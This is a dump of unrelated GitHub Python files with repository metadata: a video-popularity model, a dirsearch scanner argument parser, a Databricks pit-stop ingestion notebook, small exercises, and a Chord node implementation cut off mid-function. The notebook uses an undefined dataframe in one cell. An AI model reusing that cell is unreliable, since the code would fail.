:return: cost function value\n \"\"\"\n view_predict = predict(params, x)\n cost_vector = view_predict - y\n if num_split is not None:\n cost_vector = cost_vector[-num_split:]\n cost = np.sum(cost_vector ** 2) / 2\n return cost/len(cost_vector)\n\n\ndef grad_descent(params, x, y):\n \"\"\"\n Non-regularized gradient function for HIP model\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :return: cost function value\n \"\"\"\n mu, theta, C, c, gamma, eta = params\n view_predict = predict(params, x)\n n = len(x)\n # partial derivative for mu\n grad_mu_vector = np.zeros(n)\n grad_mu_vector[0] = x[0]\n for i in xrange(1, n):\n grad_mu_vector[i] = x[i] + C*np.sum(grad_mu_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_mu = np.sum((view_predict-y)*grad_mu_vector)\n # partial derivative for theta\n grad_theta_vector = np.zeros(n)\n grad_theta_vector[0] = 0\n for i in xrange(1, n):\n grad_theta_vector[i] = C*np.sum((grad_theta_vector[:i]-view_predict[:i]*np.log(time_decay(i, c))) * (time_decay(i, c)**(-1-theta)))\n grad_theta = np.sum((view_predict-y)*grad_theta_vector)\n # partial derivative for C\n grad_C_vector = np.zeros(n)\n grad_C_vector[0] = 0\n for i in xrange(1, n):\n grad_C_vector[i] = np.sum((C*grad_C_vector[:i]+view_predict[:i]) * (time_decay(i, c)**(-1-theta)))\n grad_C = np.sum((view_predict-y)*grad_C_vector)\n # partial derivative for c\n grad_c_vector = np.zeros(n)\n grad_c_vector[0] = 0\n for i in xrange(1, n):\n grad_c_vector[i] = C*np.sum((grad_c_vector[:i]-(1+theta)*view_predict[:i]/time_decay(i, c)) * (time_decay(i, c)**(-1-theta)))\n grad_c = np.sum((view_predict-y)*grad_c_vector)\n # partial derivative for gamma\n grad_gamma_vector = np.zeros(n)\n grad_gamma_vector[0] = 1\n for i in xrange(1, n):\n grad_gamma_vector[i] = C*np.sum(grad_gamma_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_gamma = np.sum((view_predict-y)*grad_gamma_vector)\n # partial derivative for eta\n grad_eta_vector = np.zeros(n)\n grad_eta_vector[0] = 0\n for i in xrange(1, n):\n grad_eta_vector[i] = 1 + C*np.sum(grad_eta_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_eta = np.sum((view_predict-y)*grad_eta_vector)\n return np.array([grad_mu, grad_theta, grad_C, grad_c, grad_gamma, grad_eta])/n\n\n\ndef train_process(x_train, y_train, initial_weights_sets):\n \"\"\"\n Train HIP with BFGS optimization tool\n :param x_train: train sharecount\n :param y_train: train viewcount\n :param initial_weights_sets: sets of random initial weights\n :return: best optimization parameters\n \"\"\"\n best_params = None\n best_cost = np.inf\n\n for init_idx, initial_weight in enumerate(initial_weights_sets):\n # perform non-regularized optimization with l-bfgs\n optimizer = optimize.minimize(cost_function, initial_weight, jac=grad_descent, method='L-BFGS-B',\n args=(x_train, y_train), bounds=bounds)\n if optimizer.fun < best_cost:\n best_cost = optimizer.fun\n best_params = optimizer.x\n\n return best_params\n\n\ndef plot_func(params, x, y, title, idx):\n \"\"\"\n Plot trend from R-HIP, PY-HIP and AUTO-HIP parameters\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :param title: figure title, YoutubeID\n :param idx: subplot index\n :return:\n \"\"\"\n # visualise sample data\n ax1 = fig.add_subplot(121+idx)\n # ax1 = fig.add_subplot(111)\n ax2 = ax1.twinx()\n ax1.plot(np.arange(1, age+1), y, 'k--', label='observed #views')\n ax2.plot(np.arange(1, age+1), x, 'r-', label='#share')\n ax1.plot((num_train, num_train), (ax1.get_ylim()[0], ax1.get_ylim()[1]), 'k--')\n\n ax1.set_ylim(ymin=max(0, ax1.get_ylim()[0]))\n ax2.set_ylim(ymax=3*max(x))\n ax1.set_xlabel('video age (day)')\n ax1.set_ylabel('Number of views', color='k')\n ax1.tick_params('y', colors='k')\n ax2.set_ylabel('Number of shares', color='r')\n ax2.tick_params('y', colors='r')\n\n mu, theta, C, c, gamma, eta = params\n ax2.text(0.03, 0.85, '$\\mu$={0:.2f}, $\\\\theta$={1:.2f}\\nC={2:.2f}, c={3:.2f}\\n$\\gamma$={4:.2f}, $\\eta$={5:.2f}'\n .format(mu, theta, C, c, gamma, eta), transform=ax1.transAxes)\n ax1.set_title(title)\n\n predidt_x = predict(params, x)\n ax1.plot(np.arange(1, num_train+1), predidt_x[:num_train], 'b-', label='HIP fit')\n ax1.plot(np.arange(num_train+1, age+1), predidt_x[num_train:age], 'm-', label='HIP forecast')\n\n\nif __name__ == '__main__':\n # == == == == == == == == Part 1: Load ACTIVE dataset == == == == == == == == #\n # First time it gets loaded from the JSON format and writes essential fields into a pickle binary file.\n # check if the binary exists\n if not os.path.exists('../data/active-dataset.p'):\n print('--> Converting ACTIVE dataset from JSON format to pickle... might take a while!')\n test_cases = {}\n with bz2.BZ2File('../data/active-dataset.json.bz2') as f:\n dataset = json.loads(f.readline())\n for video in dataset:\n test_cases[video['YoutubeID']] = (video['numShare'], video['dailyViewcount'])\n pickle.dump(test_cases, open('../data/active-dataset.p', 'wb'))\n\n print('--> Loading the ACTIVE dataset from pickle...')\n test_cases = pickle.load(open('../data/active-dataset.p', 'rb'))\n # select 2 videos from paper\n test_vids = ['bUORBT9iFKc', 'cG0nQTYd8ck']\n # or random select 2 videos\n # test_videos = np.array(test_cases.keys())\n # random_index = np.random.randint(0, len(test_videos), 2)\n # test_vids = test_videos[random_index]\n\n # == == == == == == == == Part 2: Set up experiment parameters == == == == == == == == #\n # setting parameters\n fig = plt.figure(figsize=(14, 5))\n age = 120\n num_train = 90\n num_test = 30\n k = 5\n bounds = [(0, None), (0, None), (0, None), (None, None), (0, None), (0, None)]\n\n for tc_idx, vid in enumerate(test_vids):\n print('fitting and forecasting for video: {0}'.format(vid))\n dailyshare, dailyview = test_cases[vid]\n dailyshare = dailyshare[:age]\n dailyview = dailyview[:age]\n\n x_train = dailyshare[: num_train]\n y_train = dailyview[: num_train]\n\n # initialize weights\n # k sets of random params\n initial_weights_sets = rand_initialize_weights(k)\n\n # == == == == == == == == Part 3: Train with closed form gradient == == == == == == == == #\n best_fitted_params = train_process(x_train, y_train, initial_weights_sets)\n\n # == == == == == == == == Part 4: Plot fitting and forecast result == == == == == == == == #\n plot_func(best_fitted_params, dailyshare, dailyview, vid, tc_idx)\n\n plt.tight_layout()\n plt.show()\n","repo_name":"zhangleihan/hip-popularity","sub_path":"pyhip/pyhip.py","file_name":"pyhip.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"72897155113","text":"# -*- coding: utf-8 -*-\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n# Author: Mauro Soria\n\nfrom optparse import OptionParser, OptionGroup\n\nfrom ...lib.utils.FileUtils import File\nfrom ...lib.utils.FileUtils import FileUtils\nfrom ...lib.utils.DefaultConfigParser import DefaultConfigParser\nfrom ...thirdparty.oset import oset\n\n\nclass ArgumentParser(object):\n def __init__(self, url, wordlist=\"./black/workers/dirsearch/dirsearch_ext/db/dicc.txt\", extensions=None, http_proxy=None, headers=None, user_agent=None, \n user_random_agents=None, cookie=None, threads_count=10, exclude_status_codes=None, path=\"/\",\n force_extensions=False, delay=0, timeout=1, ip_address=None, recursive=False, redirect=False, **kwargs):\n self.script_path = None\n\n self.url = url\n if extensions is None:\n print('No extension specified. You must specify at least one extension')\n exit(0)\n with File(wordlist) as file_wordlist:\n if not file_wordlist.exists():\n print('The wordlist file does not exist')\n exit(0)\n if not file_wordlist.isValid():\n print('The wordlist is invalid')\n exit(0)\n if not file_wordlist.canRead():\n print('The wordlist cannot be read')\n exit(0)\n if http_proxy is not None:\n if http_proxy.startswith('http://'):\n self.proxy = http_proxy\n else:\n self.proxy = 'http://{0}'.format(http_proxy)\n else:\n self.proxy = None\n if headers is not None:\n try:\n self.headers = dict((key.strip(), value.strip()) for (key, value) in (header.split(':', 1)\n for header in headers))\n except Exception as _:\n print('Invalid headers')\n exit(0)\n else:\n self.headers = {}\n\n self.extensions = list(oset([extension.strip() for extension in extensions.split(',')]))\n self.user_agent = user_agent\n self.user_random_agents = user_random_agents\n self.cookie = cookie\n if threads_count < 1:\n print('Threads number must be a number greater than zero')\n exit(0)\n self.threads_count = threads_count\n if exclude_status_codes is not None:\n try:\n self.exclude_status_codes = list(\n oset([int(exclude_status_code.strip()) if exclude_status_code else None for exclude_status_code in\n exclude_status_codes.split(',')]))\n except ValueError:\n self.exclude_status_codes = []\n else:\n self.exclude_status_codes = []\n self.path = path\n self.wordlist = wordlist\n self.force_extensions = force_extensions\n\n self.delay = delay\n self.timeout = timeout\n self.ip_address = ip_address\n self.recursive = recursive\n\n # Well, here we have constants that were used in the original dirsearch,\n # BUT i am too lazy to remove them totally. Moreover, we will probably need them in future\n self.max_retries = 3\n\n self.json_output_file = \"./output\"\n\n self.scan_subdirs = None\n self.exclude_subdirs = None\n\n self.redirect = redirect\n self.request_by_name = True\n\n self.lowercase = False\n\n self.use_random_agents = False\n self.test_fail_path = \"\"\n","repo_name":"c0rv4x/project-black","sub_path":"black/workers/dirsearch/dirsearch_ext/lib/core/ArgumentParser.py","file_name":"ArgumentParser.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"72"} +{"seq_id":"833022372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport discord\nimport aiohttp\nimport asyncio\n\nfrom discord.ext import commands\n\n\nclass Bigemoji:\n def __init__(self, client):\n self.client = client\n self.session = aiohttp.ClientSession()\n\n\n print(\"Loading Bigemoji...\")\n\n async def on_message(self, message):\n # Message author variables\n user_id = message.author.id\n user_name = message.author\n\n\ndef setup(client):\n client.add_cog(Bigemoji(client))\n","repo_name":"Mehvix/synapsBot","sub_path":"bigemoji.py","file_name":"bigemoji.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15452895119","text":"\n\nnumbers = []\nfor x in range (1000, 3001):\n split = [int(d) for d in str(x)]\n odd = False\n for y in range (0, len(split)):\n if split[y] % 2 != 0:\n odd = True\n if (odd == False):\n numbers.append(x)\nprint(numbers)","repo_name":"ayusharoraa/python-code","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16227461783","text":"# -*- encoding:utf-8 -*-\nimport pandas as pd\n# 数据查看\n# 常用reas_csv 常用参数说明 https://www.jianshu.com/p/366aa5daaba9\ndata = pd.read_csv(\"8.Regression/8.Advertising.csv\")\ndata.head()\ndata.info()\n\n\n# 数据处理\n# 缺失值处理\n# 标准化 归一化\n# 编码化 pca降纬\n# 特征提取 文本特征 feature_select文件\n\n\n\n\n\n# 网格搜索\n\n\n\n\n\n\n","repo_name":"keepingoner/ml","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30579913840","text":"import pygame\nfrom Clases import Bullet\nimport os\n\nclass SpaceShip(pygame.sprite.Sprite):\n\tdef __init__(self, WIDTH, HEIGHT):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.SPSHIMAGE = pygame.image.load(os.path.join('Images', 'nave.jpg'))\n\t\tself.EXPIMAGE = pygame.image.load(os.path.join('Images', 'explosion.jpg'))\n\t\t\n\t\tself.RECT = self.SPSHIMAGE.get_rect()\n\t\tself.RECT.centerx = WIDTH/2\n\t\tself.RECT.centery = HEIGHT - 30\n\n\t\tself.SHOOTLIST = []\n\t\tself.HEALTH = True \n\n\t\tself.VEL = 20\n\n\t\tself.SOUND_SHOOT = pygame.mixer.Sound(\"Sounds/shoot.wav\")\n\t\tself.SOUND_EXP = pygame.mixer.Sound(\"Sounds/gameover.wav\")\n\n\n\tdef MovementRight(self):\n\t\tself.RECT.right += self.VEL\n\t\tself.__movement()\n\n\tdef MovementLeft(self):\n\t\tself.RECT.left -= self.VEL\n\t\tself.__movement()\n\n\tdef __movement(self):\n\t\tif self.HEALTH == True:\n\t\t\tif self.RECT.left <= 0:\n\t\t\t\tself.RECT.left = 0\n\t\t\telif self.RECT.left > 870:\n\t\t\t\tself.RECT.left = 840\n\n\tdef Shoot(self, x, y):\n\t\tMY_BULLET = Bullet.Bullet(x,y,\"Images/disparoa.jpg\",True)\n\t\tself.SHOOTLIST.append(MY_BULLET)\n\t\tself.SOUND_SHOOT.play()\n\n\tdef Destruction(self):\n\t\tself.SOUND_EXP.play()\n\t\tself.HEALTH = False\n\t\tself.VEL = 0\n\t\tself.SPSHIMAGE = self.EXPIMAGE\n\n\tdef Draw(self, WIN):\n\t\tWIN.blit(self.SPSHIMAGE, self.RECT)","repo_name":"LauRivero150920/PygameTutorial","sub_path":"Pygame1/Clases/SpaceShip.py","file_name":"SpaceShip.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36716979280","text":"import streamlit as st\n\nfrom src import home, cleans, people, money, supports\n\ndef init():\n st.session_state.pages = {\n '🏠 Trang chủ': home.main,\n '🧹 Lịch Dọn dẹp': cleans.main,\n '🙍 Quản lý nhân sự': people.main,\n '💰 Quản lý tiền bạc': money.main,\n '🤖 Hỗ trợ': supports.main\n }\n\ndef draw_style():\n st.set_page_config(page_title = 'Quản lý nhà chung',\n page_icon = '🏠',\n layout = 'wide',\n menu_items = {\n 'Get help': 'https://www.facebook.com/chienlady/',\n 'Report a Bug': 'https://www.facebook.com/chienlady/',\n 'About': 'Trang web có mục đích riêng rư **phi lợi nhuận**.'\n })\n\n style = '''\n \n '''\n st.markdown(style, unsafe_allow_html = True)\n\ndef load_page(page_name):\n st.session_state.pages[page_name]()\n\ndef main():\n init()\n draw_style()\n with st.sidebar:\n st.markdown('# Menu quản lý trong nhà')\n st.image('https://media.giphy.com/media/cYxRo3zzej4vTAcd4r/giphy.gif')\n page = st.selectbox('Chọn đích đến',\n ('🏠 Trang chủ',\n '🧹 Lịch Dọn dẹp',\n '🙍 Quản lý nhân sự',\n '💰 Quản lý tiền bạc',\n '🤖 Hỗ trợ'),\n key = 'choose_page')\n load_page(page)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ChienLady/st-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10482240579","text":"from __future__ import print_function\nimport os\nimport sys\nimport re\nimport codecs\n\n\ndef processFile(filepath):\n fp = codecs.open(filepath, 'rU', 'iso-8859-2')\n\n content = fp.read()\n \n totalNumberOfEmails = 0\n totalNumberOfDates = 0\n totalNumberOfFloats = 0\n totalNumberOfIntegers = 0\n totalNumberOfAbbreviations = 0\n totalNumberOfSentences = 0 \n authorName = \"\"\n keywords = \"\"\n \n for emailResult in re.finditer(r'[A-Z0-9a-z._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}', content):\n #print(emailResult.group())\n totalNumberOfEmails += 1\n\n for text in re.finditer(r'

(.*?)<\\/P>', content, re.M | re.DOTALL):\n #rrrr-dd-mm or rrrr/dd/mm or rrrr.dd.mm\n for dateResult in re.finditer(r'([12]\\d{3}[-./](0[1-9]|[12]\\d|3[01])[-./](0[1-9]|1[0-2]))', text.group(1)):\n #print(dateResult.group())\n totalNumberOfDates += 1\n #dd-mm-rrrr or dd/mm/rrrr or dd.mm.rrrr\n for dateResult in re.finditer(r'((0[1-9]|[12]\\d|3[01])[-./](0[1-9]|1[0-2])[-./][12]\\d{3})', text.group(1)):\n #print(dateResult.group())\n totalNumberOfDates += 1\n for floatResult in re.finditer(r'[-+]?[0-9]*\\.[0-9]+([eE][-+]?[0-9]+)?', text.group(1), re.DOTALL):\n #print(floatResult.group())\n totalNumberOfFloats += 1\n for abbreviationResult in re.finditer(r'\\s([A-Za-z]{1,3}[.])', text.group(1)):\n #print(abbreviationResult.group())\n totalNumberOfAbbreviations += 1\n for integerResult in re.finditer(r'([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])', text.group(1)):\n #print(integerResult.group())\n totalNumberOfIntegers += 1\n for sentencesResult in re.finditer(r'([A-Z][^\\.!?]*[\\.!?])', text.group(1), re.DOTALL | re.M):\n #print(sentencesResult.group())\n totalNumberOfSentences += 1\n\n\n authorResult = re.search(r'', content)\n if authorResult:\n #print(authorResult.group(1))\n authorName = authorResult.group(1)\n \n for keywordResult in re.finditer(r' 0:\n n_racks = order(clothes, rack_capacity)\n\nprint(n_racks)\n","repo_name":"h-dmt/Python_Advanced","sub_path":"1_stacks_queues/Fashion_boutique.py","file_name":"Fashion_boutique.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17848450500","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Accessing Azure Data Lake using Access Keys ###\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\n# MAGIC %run \"./includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"./includes/common_functions\"\n\n# COMMAND ----------\n\nhs_account_key = dbutils.secrets.get(scope = 'hs-scopesecret-hs', key = 'storageaccountkey')\n\n# COMMAND ----------\n\nspark.conf.set(\n \"fs.azure.account.key.learningdatabrickstorage.dfs.core.windows.net\",\n hs_account_key\n)\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{raw_folder_path}\"))\n\n# COMMAND ----------\n\ndisplay(spark.read.csv(f\"{raw_folder_path}/pit_stops.json\"))\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DoubleType, FloatType, DateType\nfrom pyspark.sql.functions import col, current_timestamp, current_timestamp\n\n# COMMAND ----------\n\npitstops_schema = StructType(fields=[StructField(\"raceId\", IntegerType(), False),\n StructField(\"driverId\", IntegerType(), True),\n StructField(\"stop\", StringType(), True),\n StructField(\"lap\", IntegerType(), True),\n StructField(\"time\", StringType(), True),\n StructField(\"duration\", StringType(), True),\n StructField(\"milliseconds\", IntegerType(), True)\n])\n\n# COMMAND ----------\n\npitstops_df = spark.read \\\n .option(\"multiline\", True) \\\n .schema(pitstops_schema) \\\n .json(f\"{raw_folder_path}/pit_stops.json\")\n\n# COMMAND ----------\n\ndisplay(pitstops_df)\n\n# COMMAND ----------\n\nrenamed_pitstops_df = pitstops_df.withColumnRenamed(\"raceId\", \"race_id\") \\\n .withColumnRenamed(\"driverId\", \"driver_id\") \\\n .withColumn(\"ingestion_date\", current_timestamp())\n\n# COMMAND ----------\n\nrenamed_pitstops_df.printSchema()\n\n# COMMAND ----------\n\nrenamed_pitstops_df.schema.names\n\n# COMMAND ----------\n\nspark.conf.set(\"spark.sql.sources.partitionOverwriteMode\", \"dynamic\")\n\n# COMMAND ----------\n\nresults_dropped_df = results_dropped_df.select(\"result_id\", \"driver_id\", \"constructor_id\", \"number\", \"grid\", \"position\", \"position_text\",\n \"position_order\", \"points\", \"laps\", \"time\", \"milliseconds\", \"fastest_lap\", \"rank\", \"fastest_lap_time\",\n \"fastest_lap_speed\", \"file_date\", \"ingestion_date\", \"race_id\")\n\n# COMMAND ----------\n\n#renamed_pitstops_df.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}/pit_stops\")\nrenamed_pitstops_df.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_processed.pit_stops\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM f1_processed.pit_stops;\n\n# COMMAND ----------\n\ndisplay(spark.read.parquet(f\"{processed_folder_path}/pit_stops\"))\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Success\")\n","repo_name":"hserovsk/DataBricksAzure","sub_path":"ingestion/6.ingest_pit_stops.py","file_name":"6.ingest_pit_stops.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36441523455","text":"#!/usr/bin/env python3\n\nimport sys\nimport random\n\ndef cmdlinearg(name, default=None):\n for arg in sys.argv:\n if arg.startswith(name + \"=\"):\n return arg.split(\"=\")[1]\n assert default is not None, name\n return default\n\nseed = int(cmdlinearg('seed', sys.argv[-1]))\nrandom.seed(seed)\nL = int(cmdlinearg('len'))\n\nprint(''.join(random.choice(['S', 'N', 'B']) for _ in range(L)))\n","repo_name":"Kodsport/swedish-olympiad-2013","sub_path":"final/skolvagen/data/gen_random.py","file_name":"gen_random.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11483466652","text":"\"\"\"\nCPSC 5520, Seattle University\nAuthor: Leila Mirzaei\nCreated Date: Nov 18th 2022\n\nThis program implements a Chord (described here: https://pdos.csail.mit.edu/papers/chord:sigcomm01/chord_sigcomm.pdf)\nThe Chord software takes the form of a library to be linked with the client and server applications\nthat use it. The application interacts with Chord in two main ways:\n First, Chord provides a lookup(key) algorithm that yields the IP address of the node\n responsible for the key.\n\n Second, the Chord software on each node notifies the application of changes in the set of\n keys that the node is responsible for when a new node joins.\n\nThis program also allows a querier to talk to any arbitrary node in the network to query a\nvalue for a given key or add a key/value pair (with replacement).\n\n\nThe `chord_node.py` module takes a port number of an existing node (or 0 to indicate it should start a new network).\nThen, it joins a new node into the network using a system-assigned port number for itself.\nThe node joins and then listens for incoming connections (from other nodes or queriers).\nFor listening it uses a blocking TCP socket and pickle for the marshaling the messages.\n\"\"\"\nfrom datetime import datetime\n\nimport hashlib\nimport pickle\nimport socket\nimport sys\nimport threading\n\nM = 7 # Network have at most 128 possible nodes (M=7, nodes count = 2^^7 = 128).\nNODES = 2 ** M\nBUF_SZ = 4096 # socket recv arg\nBACKLOG = 100 # socket listen arg\nTEST_BASE = 43500\n\n\nclass ModRange(object):\n \"\"\"\n Range-like object that wraps around 0 at some divisor using modulo arithmetic.\n\n >>> mr = ModRange(1, 4, 100)\n >>> mr\n \n >>> 1 in mr and 2 in mr and 4 not in mr\n True\n >>> [i for i in mr]\n [1, 2, 3]\n >>> mr = ModRange(97, 2, 100)\n >>> 0 in mr and 99 in mr and 2 not in mr and 97 in mr\n True\n >>> [i for i in mr]\n [97, 98, 99, 0, 1]\n >>> [i for i in ModRange(0, 0, 5)]\n [0, 1, 2, 3, 4]\n \"\"\"\n\n def __init__(self, start, stop, divisor):\n self.divisor = divisor\n self.start = start % self.divisor\n self.stop = stop % self.divisor\n # we want to use ranges to make things speedy, but if it wraps around the 0 node, we have to use two\n if self.start < self.stop:\n self.intervals = (range(self.start, self.stop),)\n elif self.stop == 0:\n self.intervals = (range(self.start, self.divisor),)\n else:\n self.intervals = (range(self.start, self.divisor), range(0, self.stop))\n\n def __repr__(self):\n \"\"\" Something like the interval|node charts in the paper \"\"\"\n return ''.format(self.start, self.stop, self.divisor)\n\n def __contains__(self, id):\n \"\"\" Is the given id within this finger's interval? \"\"\"\n for interval in self.intervals:\n if id in interval:\n return True\n return False\n\n def __len__(self):\n total = 0\n for interval in self.intervals:\n total += len(interval)\n return total\n\n def __iter__(self):\n return ModRangeIter(self, 0, -1)\n\n\nclass ModRangeIter(object):\n \"\"\" Iterator class for ModRange \"\"\"\n\n def __init__(self, mr, i, j):\n self.mr, self.i, self.j = mr, i, j\n\n def __iter__(self):\n return ModRangeIter(self.mr, self.i, self.j)\n\n def __next__(self):\n if self.j == len(self.mr.intervals[self.i]) - 1:\n if self.i == len(self.mr.intervals) - 1:\n raise StopIteration()\n else:\n self.i += 1\n self.j = 0\n else:\n self.j += 1\n return self.mr.intervals[self.i][self.j]\n\n\nclass FingerEntry(object):\n \"\"\"\n Row in a finger table.\n\n >>> fe = FingerEntry(0, 1)\n >>> fe\n\n >>> fe.successor = 1\n >>> fe\n\n >>> 1 in fe, 2 in fe\n (True, False)\n >>> FingerEntry(0, 2, 3), FingerEntry(0, 3, 0)\n (, )\n >>> FingerEntry(3, 1, 0), FingerEntry(3, 2, 0), FingerEntry(3, 3, 0)\n (, , )\n >>> fe = FingerEntry(3, 3, 0)\n >>> 7 in fe and 0 in fe and 2 in fe and 3 not in fe\n True\n \"\"\"\n\n def __init__(self, n, k, node=None):\n if not (0 <= n < NODES and 0 < k <= M):\n raise ValueError('invalid finger entry values')\n self.start = (n + 2 ** (k - 1)) % NODES\n self.next_start = (n + 2 ** k) % NODES if k < M else n\n self.interval = ModRange(self.start, self.next_start, NODES)\n self.successor = node # This is the next active node. That is, what would\n # the node be if I wanted to store data in this interval?\n\n def __repr__(self):\n \"\"\" Something like the interval|node charts in the paper \"\"\"\n return ''.format(self.start, self.next_start, self.successor)\n\n def __contains__(self, id):\n \"\"\" Is the given id within this finger's interval? \"\"\"\n return id in self.interval\n\n\ndef sha1_hash(id_string):\n result = hashlib.sha1(id_string.encode())\n return int(result.hexdigest(), 16)\n\n\nclass ChordNode(object):\n def __init__(self, port_number):\n self.port_number = 0 if port_number > 0 else TEST_BASE\n self.if_first = True if port_number == 0 else False\n self.predecessor = None\n self.keys = {} # dictionary to store data\n self.identifier = None\n self.node = None\n self.node_socket = None\n threading.Thread(target=self.start_listening).start()\n self.finger_table = self.initialize_empty_finger_table()\n if self.if_first:\n self.join()\n else:\n endpoint_string = '127.0.0.0 ' + str(port_number)\n node_p = {'number': sha1_hash(endpoint_string) % 2 ** M, 'port': port_number}\n self.join(node_p)\n\n def start_listening(self):\n \"\"\"\n This function starts a listener socket for handling incoming RPC requests.\n It wait for accepting requests.\n When it receives a request, it starts a thread, runs an RPC handler function on the\n new thread, and then returns to listening mode.\n :return:\n \"\"\"\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:\n self.node_socket = listener\n self.node_socket.bind(('localhost', self.port_number))\n self.node_socket.setblocking(True)\n self.node_socket.listen()\n self.port_number = self.node_socket.getsockname()[1]\n print('Node just started listening on port {}.'.format(self.port_number))\n while True:\n client, client_addr = self.node_socket.accept()\n threading.Thread(target=self.handle_rpc, args=(client,)).start()\n except Exception as e:\n print(\"Error occurred in starting a listener server for the node: {}. Error = {}\".format(self.node, e))\n\n def initialize_empty_finger_table(self):\n \"\"\"\n Each node maintains a finger table with (at most) M entries.\n The finger table is used to speed up the routing of query requests.\n For example if node identifier is 1 and M = 4 then node 1 puts 2,3,5,9 in its finger table:\n Finger Table for node 1:\n entry.start = 2 \t entry.stop = 3 \t entry.next_start = 3\n entry.start = 3 \t entry.stop = 5 \t entry.next_start = 5\n entry.start = 5 \t entry.stop = 9 \t entry.next_start = 9\n entry.start = 9 \t entry.stop = 1 \t entry.next_start = 1\n\n Finger Table for node 5:\n entry.start = 6 \t entry.stop = 7 \t entry.next_start = 7\n entry.start = 7 \t entry.stop = 9 \t entry.next_start = 9\n entry.start = 9 \t entry.stop = 13 \t entry.next_start = 13\n entry.start = 13 \t entry.stop = 5 \t entry.next_start = 5\n\n Finger Table for node 13:\n entry.start = 14 \t entry.stop = 15 \t entry.next_start = 15\n entry.start = 15 \t entry.stop = 1 \t entry.next_start = 1\n entry.start = 1 \t entry.stop = 5 \t entry.next_start = 5\n entry.start = 5 \t entry.stop = 13 \t entry.next_start = 13\n\n\n A finger table entry includes both the Chord identifier and the\n address (port number) of the relevant node.\n For each node, this program uses the string of node endpoint\n name (including local host IP and port number) then use SHA-1 to\n hash it (similar to what is suggested in the Stoica, et al. paper).\n :return: an empty finger table\n \"\"\"\n while self.node_socket is None or self.port_number == 0:\n continue\n endpoint_string = '127.0.0.0' + str(self.port_number)\n self.identifier = sha1_hash(endpoint_string)\n self.node = self.identifier % (2 ** M)\n finger_table = [None] + [FingerEntry(self.node, k) for k in range(1, M + 1)] # indexing starts at 1\n return finger_table\n\n def join(self, node_p=None):\n \"\"\"\n This function joins this node to the Chord network.\n It takes an existing node as input, but if the input is None, it indicates that this\n is the first node in the Chord network and does not need to communicate with other\n nodes to notify and update them about its joining.\n When a node n joins the network, certain keys previously assigned to n’s successor\n now become assigned to n. To perform this, Chord node must perform three tasks when\n a node n joins the network:\n 1. Initialize the predecessor and fingers of node n\n 2. Update the fingers and predecessors of existing nodes to reflect\n the addition of n\n 3. Notify the higher layer software so that it can transfer state\n (e.g. values) associated with keys that node is now responsible for.\n\n :param node_p: this is an arbitrary node in the network that this current node\n learns its predecessor and fingers by asking it to look them up.\n In the Stoica, et al. paper it is said that \"We assume that the new node learns\n the identity of an existing Chord node by some external mechanism.\"\n In this program the port of other node in the Chord network is given as input.\n \"\"\"\n if node_p is not None:\n self.init_finger_table(node_p)\n self.update_others() # Move keys in (predecessor, node] from successor\n\n else: # this is the only (first) node joining in the network\n for i in range(1, M + 1):\n self.finger_table[i].successor = {'number': self.node, 